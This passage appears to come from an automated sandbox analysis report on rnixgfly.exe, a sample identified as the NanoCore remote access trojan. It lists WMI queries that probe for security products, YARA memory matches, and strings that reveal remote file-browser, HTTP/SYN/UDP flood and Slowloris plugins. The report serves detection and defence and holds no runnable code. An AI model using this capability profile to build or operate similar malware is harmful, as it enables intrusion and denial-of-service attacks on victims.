    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: 1.2.rnixgfly.exe.2223658.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.417058.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.5e41a8.2.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.58c0000.24.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.4f60000.20.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.35eb3f8.18.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.2490000.3.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.2490000.3.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.58c4629.23.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.400000.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.5e41a8.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.417058.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.58c0000.24.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.400000.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.rnixgfly.exe.2223658.2.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.rnixgfly.exe.2210000.3.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.35efa21.15.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.35eb3f8.18.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.rnixgfly.exe.2210000.3.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000002.00000002.503941570.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000002.00000002.506631236.0000000004F62000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000002.00000002.501682752.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000002.00000002.507263839.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000001.00000002.249320721.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000002.00000002.502515145.0000000002490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: rnixgfly.exe PID: 4904, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: rnixgfly.exe PID: 3192, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: rnixgfly.exe, 00000001.00000002.249320721.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Source: rnixgfly.exeString found in binary or memory: NanoCore.ClientPluginHost
    Source: rnixgfly.exe, 00000002.00000002.508686978.00000000067C0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Source: rnixgfly.exe, 00000002.00000002.508686978.00000000067C0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
    Source: rnixgfly.exe, 00000002.00000002.508822078.0000000006800000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Source: rnixgfly.exe, 00000002.00000002.508822078.0000000006800000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
    Source: rnixgfly.exe, 00000002.00000002.509009346.0000000006860000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Source: rnixgfly.exe, 00000002.00000002.503941570.00000000035E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Source: rnixgfly.exe, 00000002.00000002.508900878.0000000006830000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Source: rnixgfly.exe, 00000002.00000002.508900878.0000000006830000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
    Source: rnixgfly.exe, 00000002.00000002.506631236.0000000004F62000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Source: rnixgfly.exe, 00000002.00000002.507046182.0000000005810000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Source: rnixgfly.exe, 00000002.00000002.507046182.0000000005810000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
    Source: rnixgfly.exe, 00000002.00000002.508294915.0000000005D60000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Source: rnixgfly.exe, 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Source: rnixgfly.exe, 00000002.00000002.503941570.000000000366D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Source: rnixgfly.exe, 00000002.00000002.503941570.000000000366D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
    Source: rnixgfly.exe, 00000002.00000002.503941570.000000000366D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
